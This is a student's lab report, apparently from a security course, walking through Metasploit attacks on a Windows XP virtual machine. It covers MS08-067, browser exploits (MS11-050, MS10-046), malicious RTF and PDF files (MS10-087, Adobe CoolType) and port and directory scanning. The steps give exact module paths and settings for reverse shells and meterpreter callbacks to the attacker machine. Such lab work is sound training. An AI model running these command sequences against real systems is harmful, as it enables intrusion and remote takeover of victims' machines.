Exp5 MSF基础应用

  • 1实验要求

本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:

    1 一个主动攻击实践,如ms08_067; (1分)

    2 一个针对浏览器的攻击,如ms11_050;(1分)

    3 一个针对客户端的攻击,如Adobe;(1分)

    4 成功应用任何一个辅助模块。(0.5分)

以上四个小实践可不限于以上示例,并要求至少有一个是和其他所有同学不一样的,否则扣除0.5分。

2实验过程

攻击机kali 192.168.183.129

靶机WinXPenSP3 192.168.183.132

2.1一个主动攻击实践

Windows服务渗透攻击——MS08-067安全漏洞

1.输入msfconsole

2.输入search ms08_067进行搜索漏洞

3.复制所在位置并使用,use exploit/windows/smb/ms08_067_netapi

4.输入show options查看当前配置

5.进行配置依次输入

      set payload generic/shell_reverse_tcp

      set lhost 192.168.183.129(攻击机的ip)

      set lport 4308

      set rhost 192.168.183.132(靶机的IP)

      set taget 0

6.输入exploit进行监听,成功,输入dir进行查看

7.成功之后systeminfo获取靶机系统信息

2.2一个针对浏览器的攻击

2.2.1浏览器渗透攻击——ms11_050

1.输入search ms11_050

2.输入use exploit/windows/browser/ms11_050_mshtml_cobjectelement

3.依次输入set payload windows/meterpreter/reverse_http(http反向连接)、set lhost 192.168.183.129(攻击机ip)、set lport4308、set URIPATHhxm(统一资源标识符路径设置)

4.输入exploit

5.靶机中打开浏览器并输入,结果失败

2.2.2浏览器渗透攻击——MS10-046

1.先search ms10_046,找到漏洞

2.输入use exploit/windows/browser/ms10_046_shortcut_icon_dllloader进行使用漏洞,再设置payload、lhost(攻击机的ip)、lport,依次输入命令:set payload generic/shell_reverse_tcp、set lhost 192.168.183.129、set lport 4308

 

3.exploit之后就会生成一个URL

4.打开靶机进行搜索,结果失败了

5.尝试重新进行配置payload,将payload设置为windows/meterpreter/reverse_tcp

6.输入exploit

7.在靶机中输入进行搜索,成功了

8.用sessions命令可以看到当前活动链接

 

9.sessions -i 1接入ID为1的活动链接

10.成功获取WindowsXP的shell

 

2.3一个针对客户端的攻击

2.3.1针对Office软件的渗透攻击——MS10-087(唯一)

1.输入search ms10_087并输入use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof

2.输入set payload windows/exec(运行一个可执行文件)

3.输入set CMD calc.exe(绑定计算器程序,进行启动)

4.输入exploit,进行攻击

5.使用show options命令查看一些参数值,比如文件名、绑定程序等等。此时文件名为默认,也可以进行修改

6.将生成的msf.rtf先传到主机上,再复制到虚拟机上

7.点击打开,发现执行不了,但是由于绑定到计算器,因此打开了计算器程序,攻击成功

 

2.3.2针对Adobe Reader软件的渗透攻击——adobe_cooltype_sing(唯一)

1.打开msfconsole

2.输入searchadobe_cooltype_sing进行了解

3.输入use exploit/windows/fileformat/adobe_cooltype_sing进入该漏洞模块的使用。

 

4.输入set payload windows/meterpreter/reverse_tcp设置攻击有效载荷。

 

5.show options显示我们需要在攻击前需要设置的数据

6.输入指令 set FILENAME 4308adobe.pdf set LHOST 192.168.183.129 set LPORT 4308

7.再次使用show options查看是否设置成功

8.输入exploit生成PDF文件,并将其复制到靶机

9.使用命令back退出当前模块,使用use exploit/multi/handler新建一个监听模块。使用set payload windows/meterpreter/reverse_tcp建立一个反向连接,使用命令exploit开始攻击

10XP中打开4308adobe.pdf,在Kali上发现会回联成功

 

2.4成功应用任何一个辅助模块

2.4.1扫描端口

1.输入use auxiliary/scanner/portscan/syn(使用portscan模块)

2.输入show options

3.输入set RHOST 192.168.183.132(目标)

4.输入set THREADS 50(线程)

5.输入exploit

 

2.4.2scanner/http/dir_listing(唯一)

1.search了解一下有关scanner/http/dir_listing的相关信息

2.输入指令use auxiliary/scanner/http/dir_listing进入

show options 查看需要设置的参数

3.设置相关参数 输入set RHOST 192.168.183.132set RPORT 80 输入run 跑起来

运行成功

3实验遇到的问题

  • 在做adobe那部分的实验过程中,我运用命令生成了4308adobe.pdf,可是一直都找不到生成的文件存放在哪,主目录里根本找不到.msf4的文件夹,后来我发现需事先在“显示隐藏文件”处打钩,PDF存在于(home→.mf4→local),这才找到了文件。

 

4实验后回答问题

(1)用自己的话解释什么是exploit,payload,encode。

  1. exploit:是指攻击者或渗透测试者利用一个系统、应用或服务中的安全漏洞所进行的攻击行为, 包括利用缓冲区溢出、Web应用程序漏洞攻击,以及利用配置错误等。按照所利用的安全漏洞所在的位置分为主动渗透攻击(攻击某个系统服务),被动渗透攻击(攻击某个客户端应用)。
  2. payload:目标系统在被渗透攻击之后去执行的代码一段指令或称为shellcode。
  3. encode:编码器,确保攻击载荷中不会出现渗透攻击过程中应加以避免的“坏字符”;改变特征码,对攻击载荷进行“免杀”处理

(2)离实战还缺些什么技术或步骤?

  • 可以很明显的感觉到距离实战还是遥远的,我现在学习的东西还只是最基础的皮毛,真正投入到实战肯定还是不够用的,真正的实战可能不只是需要对msf的熟练应用、牢固掌握,还需要对新型漏洞有所了解,因为我们实验过程中针对的漏洞都是老版本了,还需要利用社会工程学的手段等等才能进行实施攻击。

5实验心得体会

  • 这次实验其实并不难,也让我对msf功能的强大有了进一步的认识,但是发现自己对msf的了解还不够,对于一些指令的理解也不透彻。另外,也认识到做一个完美的程序实在太难了,总会有各种各样的漏洞,能够被别人钻空子,还是需要努努力力学习的!

 

posted @ 2019-04-13 23:21  豆豆龙不长痘痘  阅读(280)  评论(0编辑  收藏  举报